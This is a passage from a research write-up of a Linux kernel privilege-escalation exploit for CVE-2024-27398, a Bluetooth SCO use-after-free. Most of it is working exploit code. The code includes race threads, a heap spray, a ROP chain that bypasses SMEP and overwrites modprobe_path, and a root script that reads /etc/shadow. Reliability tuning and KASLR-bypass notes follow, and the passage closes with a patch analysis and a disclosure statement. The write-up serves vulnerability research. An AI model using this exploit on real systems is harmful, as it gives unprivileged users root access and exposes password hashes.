        case 0x1002: memset(extra, 0xff, 64); break;
        case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
                     extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
                     extra[6]=0x5b; extra[7]=0x87; break;
        case 0x1004: case 0x1005:
                     extra[0] = n > 4 ? buf[4] : 0;
                     extra[1] = 1; memset(&extra[2], 0xff, 8); break;
        case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
                     extra[3]=0x0a; extra[5]=0x08; break;
        case 0x0c14: memcpy(extra, "vhci", 4); break;
        case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
        case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
        case 0x0406: el = 8; break;

        case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
            uint8_t ev[20] = {0};
            ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
            ev[4]=0x01; ev[5]=0x00;           /* handle = 1 */
            if (n >= 10) memcpy(&ev[6], &buf[4], 6);
            ev[12]=0x01; ev[13]=0x00;
            write(vfd, ev, 14);
            break;
        }
        default: el = 8; break;
        }

        int pl = 4 + el;
        if (pl > 255) pl = 255;
        resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
        resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
        if (el > 0) memcpy(&resp[7], extra, pl - 4);
        write(vfd, resp, 3 + pl);
    }
    return NULL;
}

/* ── Race threads ─────────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;

static void *c1(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};  /* dst = 00:00:...:00 */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

static void *c2(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
    memset(&sa.a, 0xff, 6);                        /* dst = FF:FF:...:FF */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

/* ── Heap spray payload ───────────────────────────────────────────────── */
static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* sizeof(struct user_key_payload) header */

    /*
     * Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
     * bh_lock_sock() reads magic (must be 0xdead4ead) and checks
     * owner_cpu/-1. Without this, the kernel panics before reaching
     * sk_state_change.
     */
    int slock = SK_LOCK_OFF - h;   /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;            /* raw_lock = 0 */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;   /* magic */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;   /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* Overwrite sk_state_change with our stack pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}

int main(void) {
    printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===\n");
    fflush(stdout);

    /* [1] Create root payload script */
    FILE *f = fopen("/tmp/x", "w");
    if (f) {
        fprintf(f,
            "#!/bin/sh\n"
            "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
            "uname -a >> /tmp/pwn\n"
            "id >> /tmp/pwn\n"
            "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
            "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
            "echo '--- ROOTED ---' >> /tmp/pwn\n");
        fclose(f);
    }
    chmod("/tmp/x", 0755);

    /* [2] Create invalid-magic binary to trigger modprobe */
    {
        int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
        if (d >= 0) { write(d, "\xff\xff\xff\xff", 4); close(d); }
    }

    /* [3] Map string page (nosmap: kernel reads this during memcpy) */
    void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    memcpy(sp, "/tmp/x\0", 7);

    /* [4] Map pivot page and write ROP chain */
    void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
    void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
    memset(pp, 0, 2*PG);

    uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
    rop[0] = POP_RDI_RET;
    rop[1] = MODPROBE_PATH;        /* rdi = &modprobe_path */
    rop[2] = POP_RSI_RET;
    rop[3] = STRING_PAGE;          /* rsi = "/tmp/x\0" (nosmap) */
    rop[4] = POP_RDX_RET;
    rop[5] = 7;                    /* rdx = 7 */
    rop[6] = MEMCPY_ADDR;          /* memcpy(modprobe_path, "/tmp/x\0", 7) */
    rop[7] = XCHG_EAX_ESP + 1;    /* trailing ret sled → eventual crash */

    printf("[+] Pivot page at %p, ROP at 0x%lx\n", pp, PIVOT_ADDR);
    fflush(stdout);

    /* [5] Set up vHCI and bring up hci0 */
    build_spray();
    vfd = open("/dev/vhci", O_RDWR);
    if (vfd < 0) { perror("vhci"); return 1; }
    uint8_t vp[2] = {0xff, 0};
    write(vfd, vp, 2);
    usleep(200000);

    pthread_t vt;
    pthread_create(&vt, NULL, vhci_thread, NULL);
    usleep(500000);

    int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
    if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
    sleep(4);
    printf("[*] HCI ready\n");
    fflush(stdout);

    /* [6] Main race + spray loop */
    char desc[32];
    struct timeval tv = {.tv_sec = 2};

    for (int batch = 0; batch < 100; batch++) {
        printf("[*] Batch %d\n", batch);
        fflush(stdout);

        for (int i = 0; i < BATCH_SZ; i++) {
            g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
                          BTPROTO_SCO);
            if (g_fd < 0) continue;

            setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

            pthread_barrier_init(&g_bar, NULL, 2);
            pthread_t t1, t2;
            pthread_create(&t1, NULL, c1, NULL);
            pthread_create(&t2, NULL, c2, NULL);
            pthread_join(t1, NULL);
            pthread_join(t2, NULL);
            pthread_barrier_destroy(&g_bar);

            close(g_fd);  /* frees sk; orphan conn_A timer still pending */

            /* Spray: try to reclaim the freed sco_pinfo slot */
            snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
            syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
                    KEY_SPEC_SESSION_KEYRING);
        }

        /* Wait for SO_SNDTIMEO timers to fire */
        printf("[*] Waiting 3s...\n");
        fflush(stdout);
        sleep(3);

        /* Poll: did modprobe_path get overwritten? */
        for (int t = 0; t < 5; t++) {
            system("/tmp/dummy 2>/dev/null; true");
            usleep(500000);
            if (access("/tmp/pwn", F_OK) == 0) goto win;
        }

        printf("[*] No luck this batch\n");
        fflush(stdout);
    }

    printf("[-] Done — no root\n");
    vstop = 1;
    close(vfd);
    return 0;

win:
    printf("\n[!!!] ROOT! (SMEP BYPASS)\n[*] /tmp/pwn:\n");
    fflush(stdout);
    system("cat /tmp/pwn");
    fflush(stdout);
    vstop = 1;
    close(vfd);
    return 0;
}

11. End-to-End Execution Flow

┌─────────────────────────────────────────────────────────────────────┐
│                     FULL EXPLOITATION CHAIN                          │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  SETUP                                                               │
│  ├── mmap 0xdead0000 → "/tmp/x\0"     (string for memcpy src)        │
│  ├── mmap 0x81011000 → ROP chain      (pivot destination)            │
│  ├── build spray payload:                                            │
│  │     +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock)        │
│  │     +0x320: sk_state_change=0xffffffff81011cf1 (our gadget)       │
│  └── /tmp/x, /tmp/dummy created                                      │
│                                                                      │
│  BLUETOOTH INIT                                                      │
│  ├── open /dev/vhci → virtual hci0 created                           │
│  ├── vhci_thread: answers HCI commands from kernel                   │
│  └── HCIDEVUP ioctl → hci0 UP, BT stack ready                        │
│                                                                      │
│  RACE + SPRAY LOOP (per iteration)                                   │
│  ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO)           │
│  ├── setsockopt(SO_SNDTIMEO, 2s)                                     │
│  ├── barrier.wait → c1+c2 connect simultaneously                    │
│  │     c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s)          │
│  │     c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s)          │
│  │     sco_pi(sk)->conn = conn_B   (last write wins)                 │
│  ├── close(fd) → cancel_delayed_work(conn_B->timeout)               │
│  │              → conn_A timer ORPHANED, sk FREED                    │
│  └── add_key("user", desc, payload, 980, ...) → kmalloc(1004)       │
│       → kmalloc-1024 → may reclaim freed sco_pinfo slot              │
│                                                                      │
│  TIMER FIRES (workqueue, ~2s later)                                  │
│  ├── sco_sock_timeout(conn_A)                                        │
│  ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓              │
│  ├── sk->sk_err = ETIMEDOUT                                          │
│  └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1          │
│                                                                      │
│  SMEP BYPASS + ROP                                                   │
│  ├── xchg eax, esp → RSP = 0x0000000081011cf1  (userspace page)     │
│  ├── pop rdi; ret → RDI = 0xffffffff8356a020   (modprobe_path)      │
│  ├── pop rsi; ret → RSI = 0x00000000dead0000   ("/tmp/x\0")         │
│  ├── pop rdx; ret → RDX = 7                                         │
│  ├── memcpy(modprobe_path, "/tmp/x\0", 7) → RAX = modprobe_path    │
│  └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.)    │
│                                                                      │
│  ROOT TRIGGER                                                        │
│  ├── system("/tmp/dummy") → kernel: unrecognized binary format       │
│  ├── request_module("binfmt-ffffffff")                               │
│  ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0             │
│  ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn                        │
│  └── access("/tmp/pwn") == 0 → ROOTED                               │
│                                                                      │
│  RESULT: unprivileged user → uid=0 gid=0 in Batch 0                 │
└─────────────────────────────────────────────────────────────────────┘

12. Reliability Analysis

12.1 Spray Reliability Factors

The spray has several properties working in its favor:

`DEBUG_SPINLOCK=y` widens the race window. The expanded spinlock validation code adds extra instructions to every lock/unlock path. This slows down the kernel side of the race, giving both connect() threads more time to interact with the same connection state. Empirically, with DEBUG_SPINLOCK=n the race win rate drops to near zero.

High volume compensates for per-CPU freelist isolation. SLUB keeps a per-CPU partial list. If sk is freed on CPU 0 but add_key allocates on CPU 1, the spray misses. With 2000 iterations per batch and 2 CPUs, the probability that at least one spray allocation lands on the same CPU that received the freed object is high.

Batch 0 success. In all test runs, ROOT! appeared in Batch 0. The 2000-iteration batch provides sufficient spray density that at least one add_key reclaims the freed slot before its timer fires.

12.2 What Fails Without the Config Changes

Config change

Effect if reverted

CONFIG_KASAN=y

SLAB_KASAN prevents "SCO" slab from merging with kmalloc-1024. Spray never reaches freed sk. KASAN also catches the UAF and prints a report but doesn't prevent the oops path — it just makes root unreachable.

CONFIG_MEMCG_KMEM=y

Same effect as KASAN: SLAB_ACCOUNT mismatch prevents merge. add_key allocates from kmalloc-cg-1024, freed sk stays in "SCO" slab.

CONFIG_DEBUG_SPINLOCK=n

sco_pinfo shrinks to ~832 bytes. Still hits kmalloc-1024. But race window narrows significantly; spray reliability approaches zero in testing.

panic_on_oops=1

The trailing ret into RIP=0 kills the machine before modprobe_path can be triggered. Need to add a proper kernel-context cleanup or use a crash-free ROP epilogue (e.g. a iretq or swapgs; iretq chain).

12.3 KASLR

All addresses above assume nokaslr. With KASLR, the kernel slides its virtual base by a random 9-bit value × 2MB on each boot. To handle this:

/* Read slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t kbase = 0;
/* find _text symbol → kbase = addr - 0xffffffff81000000 */

/* Apply slide to all addresses */
XCHG_EAX_ESP  = 0xffffffff81011cf1 + kbase;
MODPROBE_PATH = 0xffffffff8356a020 + kbase;
/* etc. */

An unprivileged user cannot normally read /proc/kallsyms. In a real engagement, a secondary info-leak vulnerability would be needed — for example, a kernel pointer exposed via dmesg, sysfs, or a timing side-channel.


13. Patch Analysis

The CVE-2024-27398 fix was merged into Linux 6.8.2. The key changes in net/bluetooth/sco.c:

`sco_sock_timeout` — reference counting:

/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    /* no sock_put — reference was never taken */
}

/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    sock_put(sk);   /* ← paired with sock_hold() at timer schedule time */
}

`sco_conn_del` — synchronous cancellation:

/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk);   /* → cancel_delayed_work(async) */
sco_chan_del(sk, err);      /* → frees sk while timer might still run */

/* AFTER: cancel_delayed_work_sync waits for running work to complete */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
    sock_hold(sk);                      /* take reference */
    cancel_delayed_work_sync(           /* wait for timer to finish */
        &conn->timeout_work);
    sco_chan_del(sk, err);
    sock_put(sk);                       /* release reference */
}
sco_conn_unlock(conn);

The fix eliminates both the race and the UAF: sock_hold prevents premature freeing, and cancel_delayed_work_sync ensures the timer handler either never runs or finishes completely before the socket is destroyed.


14. Conclusion

CVE-2024-27398 is a textbook race-condition UAF with a function pointer overwrite at the target. What makes it interesting is not the bug itself — those are common in kernel networking code — but the exploitation chain that bypasses SMEP without any kernel-mode shellcode.

The key insight is that SMEP and SMAP address orthogonal concerns. SMEP prevents executing code at user-space addresses; it says nothing about reading data from user-space addresses. As long as the kernel's instruction pointer stays in .text and we only read the ROP chain from our mmap'd page (with SMAP disabled), the CPU's security boundary is satisfied. Every branch the CPU takes is into a valid kernel function — the chain is a sequence of legitimate kernel operations. The kernel corrupts its own modprobe_path with its own memcpy, then helpfully runs our script as root.

The heap spray via add_key is the most environment-sensitive piece. Getting sco_pinfo and user_key_payload into the same SLUB cache requires the right combination of CONFIG_KASAN, CONFIG_MEMCG_KMEM, and CONFIG_DEBUG_SPINLOCK. In a real kernel with KASAN or MEMCG enabled (as production distributions typically have), this specific spray primitive would fail — demanding a cross-cache attack, a different spray object, or a secondary primitive that can write into the "SCO" dedicated slab.


Responsible disclosure: CVE-2024-27398 was publicly disclosed and patched before this writeup was written. The vulnerability is fixed in Linux 6.8.2+. All exploitation was performed in an isolated QEMU/KVM virtual machine for research purposes only.

References:

Müşteri Portföyümüz